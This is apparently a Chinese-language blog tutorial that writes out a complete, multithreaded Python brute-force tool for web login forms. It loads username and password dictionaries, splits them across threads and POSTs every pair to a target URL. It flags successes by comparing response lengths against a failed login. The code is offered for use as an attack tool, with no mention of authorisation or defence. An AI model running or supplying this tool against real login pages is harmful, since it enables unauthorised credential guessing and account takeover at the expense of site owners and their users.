登录脚本

登录脚本_第1张图片

import optparse
parser = optparse.OptionParser()    #初始化对象
parser.usage = "Brute_force.py -u user_file"   #使用说明
parser.add_option("-u","--user_file",help="read username from file",action="store",type="string",metavar="FILE",dest="username_file")		#添加参数 -u是参数,--user_file是所传的值,dest保存所传的值,help是说明文档,action必须填,type所传的类型,metavar可以忽略
(options,args) = parser.parse_args()   #用一个元组来存储命令行提交的参数
print(options.username_file)	#打印所传的值

结果如下

C:\Users\lnterpreter\Desktop> python Brute_force.py -u username.txt
username.txt

下面我们将写一个爆破工具

import optparse
import math				#向下取整的模块
import threading
import requests

parser = optparse.OptionParser()    #初始化对象
parser.usage = "web_Brute_force.py -s url -u user_file -p pass_file -t num"   #使用说明
parser.add_option("-s","--site",dest="website",help="website",action="store",type="string",metavar="URL")
parser.add_option("-u","--userfile",dest="userfile",help="username from file",action="store",type="string",metavar="USERFILE")
parser.add_option("-p","--passfile",dest="passfile",help="password from file",action="store",type="string",metavar="PASSFILE")
parser.add_option("-t","--threads",dest="threads",help="ThreadNum",action="store",type="int",metavar="THREADS")
(options,args) = parser.parse_args()
site = options.website
user_dict = options.userfile
pass_dict = options.passfile
ths = options.threads

pass_list = []   #密码线程最终列表
result_num =0 	 #线程读取内容行数
#第一步  读取密码字典内容到列表中,确定行数
with open(pass_dict) as f:
	temp_list = f.readlines()
	temp_thread_list = []
	num = len(temp_list)
#第二步确定每个线程读几项
	result = num / ths
	# print(result)

#第三步向下取整
	result = math.floor(result)
	result_num = result
	flag = 0
	for line in temp_list:
		flag = flag+1
		temp_thread_list.append(line.strip())		#strip()用来去掉\n
		if flag == result:
		    flag = 0
		    pass_list.append(temp_thread_list)
		    temp_thread_list = []
	for line in temp_thread_list:			#多余的放在最后一个线程中
		pass_list[ths-1].append(line)

def test():
	r = requests.post(site,data={"username":111,"password":111,"submit":"login"})	   #爆破的格式(看需要什么参数,我这没验证码)
	return len(r.text)		#爆破中页面失败的长度,


error_lenght = test()


def scan(payload):
	user = payload["user"]
	pass_list = payload["pass_list"]
	for password in pass_list:
		r = requests.post(url=site,data={"username":user,"password":password,"submit":"login"})		
		if len(r.text) != error_lenght :
			print("url "+ site + " "+"username:" + user + " " + "password:" + password + " " + "length: " + str(len(r.text)) +"\r\n")

#字典爆破
ths_list = []
with open(user_dict,'r') as f:
	user_list = f.readlines()
	for user in user_list:
		for pass_line in pass_list:
			payload = {"user":user.strip(),"pass_list":pass_line}
			ths_list.append(threading.Thread(target=scan,args=(payload,)))

for th in ths_list:
	th.start()

你可能感兴趣的:(登录脚本)